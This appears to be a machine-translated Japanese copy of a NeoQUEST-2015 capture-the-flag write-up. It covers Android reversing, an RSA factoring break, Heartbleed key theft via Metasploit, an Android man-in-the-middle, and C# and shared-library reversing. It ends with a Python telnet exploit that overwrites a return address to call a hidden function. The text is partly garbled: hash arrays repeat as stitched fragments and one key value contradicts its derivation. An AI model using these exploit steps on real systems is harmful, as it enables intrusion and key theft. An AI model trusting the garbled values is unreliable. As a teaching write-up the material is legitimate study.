NeoQUEST-2015：HeartBleed、Androidおよび少し逆

こんにちは、Habr！ 夏が近づいており、それとともに「フルタイム」のNeoQUEST-2015です。 イベントへの登録は既に開かれており、入場は無料です。 ゲストは、サイバーセキュリティ、コンテスト、ギフトなどに関する講演やワークショップに招待されています！ これらはすべて7月にすでに行われており、NeoQUEST-2015のオンラインステージのタスクを引き続き分析しています。 この記事では：

• 「ミスティックスクエア」-Androidの 「タグ」とRSA暗号システムへの攻撃
• 「メイソン接続」 -ネットワークトラフィックのダンプの分析と、その後のHeartBleed脆弱性の実装
• 「RaSSLedovanie」-Androidでの中間者攻撃
• 友情と兄弟愛 -C＃アプリケーションリバース

1.「ミスティックスクエア」-Androidの「タグ」

「タグ」を収集します

したがって、最初はgame.apkファイルがありますが、これはAndroidアプリケーションに過ぎないことは明らかです。



まず、それを起動する価値があります-これは、単純な子供向けの「タグ」ゲームであることがわかります。 ctfでタスクを完了するために本当に写真を収集する必要がありますか？ そうです！ アプリケーション自体で画像を収集するか、アプリケーションリソース（res / drawableディレクトリ）から画像をプルし、グラフィカルエディターで段落を折り畳むことで画像を収集できます。 画像を収集し、「10838670582455823456841」という行を取得しました。

Androidアプリのリバース

次に何をする？ 最初の考えは、Androidアプリケーションを逆にすることです。 アプリケーションからclasses.dexファイルを取得します。これは、Androidで使用されるプログラムのバイトコードです。 次に、dex2jarユーティリティを使用して、classs.dex.dex2jar.jarファイルを取得します。これは、jd-guiプログラムを使用して見るのに便利です。



エントリポイントはMyActivityクラスです。

public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent) { switch (paramInt) { default: return super.onKeyDown(paramInt, paramKeyEvent); case 82: } startActivity(new Intent(this, InputOne.class)); return true; }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ボタンをクリックすると、InputOneが呼び出されることがわかります。 InputOneクラスを見てみましょう。

 public class InputOne extends Activity { protected void onCreate(Bundle paramBundle) { super.onCreate(paramBundle); setContentView(2130903041); EditText localEditText = (EditText)findViewById(2131034112); ((Button)findViewById(2131034113)).setOnClickListener(new View.OnClickListener(localEditText) { public void onClick(View paramView) { String str1 = this.val$editText.getText().toString(); if (new File("/sdcard/key.txt").exists()) { String str2 = Simple.Decrypt(str1); Toast.makeText(InputOne.this.getBaseContext(), str2, 1).show(); return; } try { Simple.get(str1); return; } catch (IOException localIOException) { localIOException.printStackTrace(); } } }); } }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

このクラスでは、入力フィールドに入力された行が取得され、ファイル「/sdcard/key.txt」の存在が確認されます。 そうである場合、SimpleクラスのDecryptメソッドが呼び出され、そうでない場合、同じクラスのgetメソッドが呼び出されます。 これらの各メソッドは、入力フィールドに入力された文字列を渡します。

そのようなファイルはありません-getメソッドを見てください。

 public static void get(String paramString) throws IOException { QueryString localQueryString = new QueryString().add("message", paramString); if (localQueryString == null) Log.e("Info", "NULL"); for (URLConnection localURLConnection = new URL("http://79.175.2.83/0b32bd28a8632f9895f9d5d8a6c51dad/game.php").openConnection(); ; localURLConnection = new URL("http://79.175.2.83/0b32bd28a8632f9895f9d5d8a6c51dad/game.php?" + localQueryString).openConnection()) { localURLConnection.getInputStream(); String str = readStreamToString(localURLConnection.getInputStream(), "UTF-8"); Log.e("Info", str); if (!str.equals("Error")) { FileWriter localFileWriter = new FileWriter(new File("/sdcard/key.txt")); localFileWriter.write(str); localFileWriter.close(); } return; } }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

このメソッドは、「http://79.175.2.83/0b32bd28a8632f9895f9d5d8a6c51dad/game.php?message= 'entered string'」という形式のGETリクエストを生成し、結果が「エラー」でない場合、ファイル「/sdcard/key.txt」に保存します。 「。



次に、ゲームから受け取ったコードをアプリケーションに入力する必要があります。これにより、key.txtファイルがデバイスのメモリカードにダウンロードされます。 ファイルの形式は次のとおりです。



5890287499022904927250918089905639153507

3148792732424313619076650032785631134

キー= a0bf0f01485a59addf4f9374e7c2a7b5

「注意-暗号化！」

最初のキーがマイニングされ、注意力と少しの暗号化のタスクになりました。 SimpleクラスのDecryptメソッドはまだ調査されていません。同じ入力行にファイル「/sdcard/key.txt」を入力すると呼び出されます。 しかし、最初に、そこで何が起こるかを理解しましょう。

  public static String Decrypt(String paramString) { ArrayList localArrayList = new ArrayList(); try { Scanner localScanner = new Scanner(new File("/sdcard/key.txt")); while (localScanner.hasNextLine()) localArrayList.add(localScanner.nextLine()); } catch (FileNotFoundException localFileNotFoundException) { return "0"; } BigInteger localBigInteger = new BigInteger((String)localArrayList.get(0)); if (new BigInteger((String)localArrayList.get(1)).modPow(e, n).equals(localBigInteger)) { new File("/sdcard/key.txt").delete(); return localBigInteger.modPow(new BigInteger(paramString), n).toString(16); } return "0"; }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

したがって、通常のRSAである前に、公開キー（e、n）を知っています。すぐにdを見つけ、それを入力行に入力してキーを取得したいのですが、それは何よりも重要です。 ここで何が起こるか見てみましょう。



ファイルの最初の行に署名し、2番目の行に署名します。 プログラムはmes≡sign ^e （mod n）をチェックし、その後mes ^d （mod n）が計算されます。 それでは、それが何であるかを考えましょう。 キーキーがあり、dで暗号化され、mes≡key ^d （mod n）を取得し、mes≡sign ^e （mod n）に署名して、これらすべてをファイルに書き込みました。 少し注意が必要です。キー≡記号（mod n）、つまりキーがファイルの2行目、つまり「3148792732424313619076650032785631134 = 0x025e6f77c39943f83d1d2f8770a1a79」であることを確認します。 そして今、注意力の2番目のテスト：すべてのキーは128ビットのハッシュ値です。つまり、キーは025e6f77c39943f83d1d2f8770a1a79であり、それだけです！



注意度の低いものの通過オプションは、nを8286006298514071265735892332006920710569 = 81227239281928373027 * 102010192292200202947で因数分解し、nのオイラー関数を計算することです。



φ（n）=（81227239281928373027-1）*（102010192292200202947-1）= 8286006298514071265552654900432792134596



d = 4708825181381486710928551540092728302699のnを法とする乗法としてdを計算するだけです。入力行にdを入力すると、25e6f77c39943f83d1d2f8770a1a79が取得され、最初の0が追加されて025e6f83d1c143943が取得されます。



したがって、参加者はゲーム「15」で画像を収集し、アプリケーションを少し逆にし、見つかった入力行にキーを入力し、RSAスキームの実装でエラーを見つける（非常に注意してください）か、モジュール分解に攻撃を行う必要がありました。 ちなみに、クエスト参加者がこことここでどのようにこのタスクを完了したかを見ることができます （2番目のリンクには、いくつかのNeoQUEST-2015タスクのかなり大きな概要が含まれています）。

2.「メイソン接続」-ハートブリードを実装します

割り当て時に、Neoquest参加者にはネットワークダンプファイルが発行されます。 たとえばWiresharkで開くと、次のパッケージが表示されます。







このダンプから、2つのノード間のhttpsトラフィックがここで収集され、クライアントがIPアドレス79.175.2.84でサーバーに接続し、標準ポート443が使用されていることがわかります。このサーバーにアクセスして、次の応答を取得します。



申し訳ありませんが、私たちはあなたを知りません



次のステップは、脆弱性を検索するためにこのサーバーをスキャンすることです。 運が良ければ、なんらかの抜け穴を見つけたらどうでしょう！ ポート443を覚えて、最初に既知のSSL Heartbleedの脆弱性についてサーバーをチェックします。 これを行うには、Nmap Scripting Engineから適切なスクリプトを使用できます。







頑張って！ SSLでよく知られている脆弱性、HeartBleedを本当に見つけました。

私たちにとって最も重要なことは、それを利用して、サーバーの秘密鍵を取得し、ダンプを解読できることです。 すぐに言ってやった！ Metasploitを取得し、openssl_heartbleedスクリプトを実行します。このような簡単な動作で、秘密キーを取得します。







キーを受信すると、最初のステップが実行され、トラフィックを復号化して、トラフィックからより多くの情報を取得できます。 Wiresharkに戻り、キーをアップロードしてトラフィックを復号化しましょう。 復号化後、次のものが得られます。







復号化されたダンプでは、主にGETリクエストに関心があります。 Cookie：idとhashがそこに渡されることがわかります。 どうやら、彼らは認証に使用されます。







珍しいユーザーエージェント：「グランドロッジ」も注目を集めています。 同じCookieとUser-Agentを使用してパケットを送信すると、次の応答が返されます。







リンクをたどると、目的のキーが見つかります！

3.「raSSLedovanie」-Androidでの中間者攻撃

タスクからssviewer.apk APKファイルをダウンロードし、Androidエミュレーターにインストールします。 アプリケーションを起動すると、インターフェースが表示されます。







ボタンをクリックしてください：







「200 ok」というメッセージは、アプリケーションとサーバーとのネットワーク相互作用を示しています。 スニファーで調べてみましょう（たとえば、 Fiddlerを取得します）。 db765.ruへのアピールがあります。 MITM攻撃を実行してみましょう。

Fiddlerをセットアップし、そのルート証明書をエクスポートします。







その後、Androidの証明書を信頼済みに追加します。 Fiddlerでトラフィックをリッスンするプロキシをインストールします。







アプリケーションを再度起動し、スニファーでサーバーの応答をキャッチします。







答えにはbase64があります。 解凍してzipアーカイブを取得します。このファイルには、「SSLK3YDB765」という回答が記載された写真があります。



実践が示しているように、多数の参加者がこのタスクに対処し、受賞者n0n3m4は興味深いタイトル「NeoQUEST 2015：raSSLedovanieを13分で解決する方法」で記事を書きました 。

4.「友情と兄弟愛」-C＃での逆適用

参加者に与えられたのは、login.exeと.so形式のファイルの2つのファイルだけでした。 login.exeを実行した後、アプリケーションはログインを要求します。

パート1

.NET Reflectorを取り出して、逆コンパイルします。 短い検索の後、次のコードを見つけます。

 private void textBox1_TextChanged(object sender, EventArgs e) { string text = this.textBox1.Text; if (text.Length == 0) { this.label1.Text = "Enter you login"; } else if (!this.hashes.Contains<string>(this.GetHashString(text))) { this.label1.Text = "Incorrect login!"; } else if (text.Length == 0x20) { this.label1.Text = "You have successfully logged in!"; this.groupBox1.Enabled = false; this.tcpSocket = new TcpClient(this.host, this.port); this.groupBox2.Visible = true; this.timer1.Start(); } else { this.label1.Text = "Enter next character of your login"; } }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

次の行に興味があります。

 else if (!this.hashes.Contains<string>(this.GetHashString(text)))
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

コードは、入力された現在のログインのハッシュのハッシュ配列をチェックします。

ハッシュ関数：

 private string GetHashString(string s) { byte[] bytes = Encoding.ASCII.GetBytes(s); byte[] buffer2 = new MD5CryptoServiceProvider().ComputeHash(bytes); string str = string.Empty; foreach (byte num in buffer2) { str = str + string.Format("{0:x2}", num); } return str; }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

ハッシュ配列：

 this.hashes = new string[] { "dfa7b3505d612417911b86b89f869d6c", "73b6951965fda60be0c69da1411e59af", "4ad9eab6a9bd83eec4723d05444059e2", "4f60dca64aedd943e4fccb8bbf18e25c", "9ed2ac984ed7182a4974a4bab0ad8fcd", "826fc5d7998c16eeb77abc00702a00ab", "4ec559ee5a6249f0c69ab8ff9b804072", "0eebdd1e6d919d04cdee9646607786c3", "172cfbcb9d8de7425233fd7183f43c21", "7174ce70d0702083e26d285196d36cf2", "77526663ec282d1d1f62229ab980edd5", "c7f399fb9f981ba2445ba573ec668cef", "efa9d9d29367af2b3c1cc1494f882f2d", "01e5f7d323222fd161fcbd0b32f26b2b", "83daec0d569704618ecf60d19b031082", "a2c2c74263df7545cb857b69ce5820b2", "ac13be701bc79036602ae9f355e6c389", "d33bf0c58b48508c706d32c6e8a171d4", "138378fc00ad7d559f0418019e750b19", "39eb98f5edec84e35f52feff51c94a25", "3ff5db4ebc8437f338ce978fddcfb334", "e1cd7a2a000a2fe69f909a2e46dab073", "bf80eafce6f8d51220dd6603295852d5", "f8bc2fbe2c937ea5b5e8839cbea69491", "e8bb39c756ad2b46a80b3f07c8422037", "a3d4832c6cc0b51163e04301e6a17b55", "bc7a6cff6c8507488e186d378ec12b38", "deaeb78d2c64a16cecd1a718e226db52", "c81e728d9d4c2f636f067f89cc14862c", "7742638106aea26564f3f6fa02fe1265", "7c8104aa5e88bee40658c61c5f869284", "71e157ffdf45f4946e95d0ac115466a1" };
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     "4ad9eab6a9bd83eec4723d05444059e2"、 "4f60dca64aedd943e4fccb8bbf18e25c"、 "9ed2ac984ed7182a4974a4bab0ad8fcd"、 "826fc5d7998c16eeb77abc00702a00ab"、 "4ec559ee5a6249f0c69ab8ff9b804072"、 "0eebdd1e6d919d04cdee9646607786c3"、 "172cfbcb9d8de7425233fd7183f43c21"、 "7174ce70d0702083e26d285196d36cf2"、 "77526663ec282d1d1f62229ab980edd5"、 "c7f399fb9f981ba2445ba573ec668cef"、「efa9d9d29367af2b3c1cc1494f882f2d this.hashes = new string[] { "dfa7b3505d612417911b86b89f869d6c", "73b6951965fda60be0c69da1411e59af", "4ad9eab6a9bd83eec4723d05444059e2", "4f60dca64aedd943e4fccb8bbf18e25c", "9ed2ac984ed7182a4974a4bab0ad8fcd", "826fc5d7998c16eeb77abc00702a00ab", "4ec559ee5a6249f0c69ab8ff9b804072", "0eebdd1e6d919d04cdee9646607786c3", "172cfbcb9d8de7425233fd7183f43c21", "7174ce70d0702083e26d285196d36cf2", "77526663ec282d1d1f62229ab980edd5", "c7f399fb9f981ba2445ba573ec668cef", "efa9d9d29367af2b3c1cc1494f882f2d", "01e5f7d323222fd161fcbd0b32f26b2b", "83daec0d569704618ecf60d19b031082", "a2c2c74263df7545cb857b69ce5820b2", "ac13be701bc79036602ae9f355e6c389", "d33bf0c58b48508c706d32c6e8a171d4", "138378fc00ad7d559f0418019e750b19", "39eb98f5edec84e35f52feff51c94a25", "3ff5db4ebc8437f338ce978fddcfb334", "e1cd7a2a000a2fe69f909a2e46dab073", "bf80eafce6f8d51220dd6603295852d5", "f8bc2fbe2c937ea5b5e8839cbea69491", "e8bb39c756ad2b46a80b3f07c8422037", "a3d4832c6cc0b51163e04301e6a17b55", "bc7a6cff6c8507488e186d378ec12b38", "deaeb78d2c64a16cecd1a718e226db52", "c81e728d9d4c2f636f067f89cc14862c", "7742638106aea26564f3f6fa02fe1265", "7c8104aa5e88bee40658c61c5f869284", "71e157ffdf45f4946e95d0ac115466a1" };
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     "138378fc00ad7d559f0418019e750b19"、 "39eb98f5edec84e35f52feff51c94a25"、 "3ff5db4ebc8437f338ce978fddcfb334"、 "e1cd7a2a000a2fe69f909a2e46dab073"、 "bf80eafce6f8d51220dd6603295852d5"、 "f8bc2fbe2c937ea5b5e8839cbea69491"、 "e8bb39c756ad2b46a80b3f07c8422037"、 "a3d4832c6cc0b51163e04301e6a17b55"、 "bc7a6cff6c8507488e186d378ec12b38"、 "deaeb78d2c64a16cecd1a718e226db52"、「c81e728d9d4c2f636f067f89cc14862c this.hashes = new string[] { "dfa7b3505d612417911b86b89f869d6c", "73b6951965fda60be0c69da1411e59af", "4ad9eab6a9bd83eec4723d05444059e2", "4f60dca64aedd943e4fccb8bbf18e25c", "9ed2ac984ed7182a4974a4bab0ad8fcd", "826fc5d7998c16eeb77abc00702a00ab", "4ec559ee5a6249f0c69ab8ff9b804072", "0eebdd1e6d919d04cdee9646607786c3", "172cfbcb9d8de7425233fd7183f43c21", "7174ce70d0702083e26d285196d36cf2", "77526663ec282d1d1f62229ab980edd5", "c7f399fb9f981ba2445ba573ec668cef", "efa9d9d29367af2b3c1cc1494f882f2d", "01e5f7d323222fd161fcbd0b32f26b2b", "83daec0d569704618ecf60d19b031082", "a2c2c74263df7545cb857b69ce5820b2", "ac13be701bc79036602ae9f355e6c389", "d33bf0c58b48508c706d32c6e8a171d4", "138378fc00ad7d559f0418019e750b19", "39eb98f5edec84e35f52feff51c94a25", "3ff5db4ebc8437f338ce978fddcfb334", "e1cd7a2a000a2fe69f909a2e46dab073", "bf80eafce6f8d51220dd6603295852d5", "f8bc2fbe2c937ea5b5e8839cbea69491", "e8bb39c756ad2b46a80b3f07c8422037", "a3d4832c6cc0b51163e04301e6a17b55", "bc7a6cff6c8507488e186d378ec12b38", "deaeb78d2c64a16cecd1a718e226db52", "c81e728d9d4c2f636f067f89cc14862c", "7742638106aea26564f3f6fa02fe1265", "7c8104aa5e88bee40658c61c5f869284", "71e157ffdf45f4946e95d0ac115466a1" };
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

Python 3ログインマッチングプログラムは次のようになります。

 import hashlib hashes = ( 'dfa7b3505d612417911b86b89f869d6c', '73b6951965fda60be0c69da1411e59af', '4ad9eab6a9bd83eec4723d05444059e2', '4f60dca64aedd943e4fccb8bbf18e25c', '9ed2ac984ed7182a4974a4bab0ad8fcd', '826fc5d7998c16eeb77abc00702a00ab', '4ec559ee5a6249f0c69ab8ff9b804072', '0eebdd1e6d919d04cdee9646607786c3', '172cfbcb9d8de7425233fd7183f43c21', '7174ce70d0702083e26d285196d36cf2', '77526663ec282d1d1f62229ab980edd5', 'c7f399fb9f981ba2445ba573ec668cef', 'efa9d9d29367af2b3c1cc1494f882f2d', '01e5f7d323222fd161fcbd0b32f26b2b', '83daec0d569704618ecf60d19b031082', 'a2c2c74263df7545cb857b69ce5820b2', 'ac13be701bc79036602ae9f355e6c389', 'd33bf0c58b48508c706d32c6e8a171d4', '138378fc00ad7d559f0418019e750b19', '39eb98f5edec84e35f52feff51c94a25', '3ff5db4ebc8437f338ce978fddcfb334', 'e1cd7a2a000a2fe69f909a2e46dab073', 'bf80eafce6f8d51220dd6603295852d5', 'f8bc2fbe2c937ea5b5e8839cbea69491', 'e8bb39c756ad2b46a80b3f07c8422037', 'a3d4832c6cc0b51163e04301e6a17b55', 'bc7a6cff6c8507488e186d378ec12b38', 'deaeb78d2c64a16cecd1a718e226db52', 'c81e728d9d4c2f636f067f89cc14862c', '7742638106aea26564f3f6fa02fe1265', '7c8104aa5e88bee40658c61c5f869284', '71e157ffdf45f4946e95d0ac115466a1' ) login = '' chars = 'abcdef1234567890' for i in range(32): for j in range(len(chars)): hash = hashlib.md5((login + chars[j]).encode('utf-8')).hexdigest() if hash in hashes: login += chars[j] print(login)
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

その結果、2b638b6da52bfad2d99dbab4018237dfというキーが表示されます。

パート2

最初の部分（付録C＃）でキーが正常に選択されると、telnetコンソールが開き、パスワードの入力を求められます。 libtest.soライブラリも必要です。







Puttyを使用する方がはるかに便利です（.NET ReflectorでIPとポートを確認します）

 this.host = "79.175.2.85"; this.port = 0x1f90;
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

libtest.soを逆アセンブルします。 最初に気付くのは、StartTest関数です。

 public StartTest StartTest proc near s2= byte ptr -20h push rbp mov rbp, rsp sub rsp, 20h lea rdi, aHello ; "\nHello!\n" call _puts mov rax, cs:pGetFlag_ptr mov rdx, cs:GetFlag_ptr mov [rax], rdx lea rsi, modes ; "r" lea rdi, aHomeSrvPass_tx ; "/home/srv/pass.txt" call _fopen …
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

コードはファイル/home/srv/pass.txtを読み取り、ユーザーが入力した行と比較します。 パスワードが一致すると、ファイル/home/srv/flag2.txtのテキストが画面に表示されます。 それ以外の場合、検証サイクルが繰り返されます。

 loc_DD4: ; seconds mov edi, 1 call _sleep lea rax, [rbp+s2] lea rdx, [rbp+s2] add rdx, 10h mov rsi, rax ; s2 mov rdi, rdx ; s1 call _strcmp test eax, eax jnz short loc_D7A
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

明らかに、ユーザーが16文字より長いパスワードを入力すると、ファイルから読み取られたパスワードを持つスタック変数が上書きされます。

 mov rax, cs:stdin_ptr mov rdx, [rax] ; stream lea rax, [rbp+s2] mov esi, 64h ; n mov rdi, rax ; s call _fgets
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

Cの元の構造：

 struct info { char entered_pass[16]; char correct_pass[16]; };
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

フラグを取得するには、2番目のリクエストで「aaaaaaaaaaaaaaaaaa」（17文字）と1つの書き換えられた文字を入力するだけで十分です。







2番目のフラグ：3ed54ac12757f4c2b4fabd64d41de42d

パート3

3番目のキーを取得するには、libtest.soのリストに戻りましょう。

GetFlag関数は疑わしいようです：

 public GetFlag GetFlag proc near s= byte ptr -70h stream= qword ptr -8 push rbp mov rbp, rsp sub rsp, 70h lea rsi, modes ; "r" lea rdi, filename ; "/home/srv/flag3.txt" call _fopen …
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

コードはファイル「/home/srv/flag3.txt」を読み取り、画面に表示します。 しかし、関数はどこにも呼び出されません！

2番目の部分から、アプリケーションがスタックオーバーフローに対して脆弱であることがわかります。 GetFlag関数を呼び出すシェルコードを作成してみましょう。



Entered_pa​​ssに入力します。

 \x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

correct_passを入力します。

 \x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

次に、GetFlag関数が実行されるように、リターンアドレスを書き換える必要があります。

GetFlag関数のアドレスを決定するには、バックトレースの出力が必要です。これは、16文字を超えるパスワードを入力した場合のヒントとして表示されます。



したがって、バックトレースからStartTestのアドレスを見つけることができ、この関数に関してはすでにGetFlagのアドレスを計算します。 アドレスは開始ごとに変化するため、StartTestアドレスをその場で取得し、GetFlagアドレスを計算する必要があります。



Python 2.7でフラグを取得するコードは次のようになります。

 import telnetlib import re tn = telnetlib.Telnet('79.175.2.85', 8080) read = tn.read_until(b"password: ").decode() print(read) tn.write(b'aaaaaaaaaaaaaaaaa\r\n') read = tn.read_until(b"password: ").decode() print(read) p = re.compile(r'\(StartTest\+0xd0\) \[(.+?)\]', re.MULTILINE | re.DOTALL) m = p.search(read) addr = (hex(int(m.group(1), 16) - 208 - 271))[2:] raddr = '' raddr += addr[10]; raddr += addr[11]; raddr += addr[8]; raddr += addr[9]; raddr += addr[6]; raddr += addr[7]; raddr += addr[4]; raddr += addr[5]; raddr += addr[2]; raddr += addr[3]; raddr += addr[0]; raddr += addr[1]; raddr = raddr.decode('hex') tn.write(b'\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' + raddr + '\x00\x00\n') read = tn.read_until(b"password: ").decode() print("") print(read)
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

3番目のフラグ：1946fcc08e026023fd53f935769c7f52

継続するには...

さらに-もっと！ 先にNeoQUEST-2015の残りのタスクの分析があります。その後、7月の「対決」でゲストを待っている秘密のベールを開き始めます！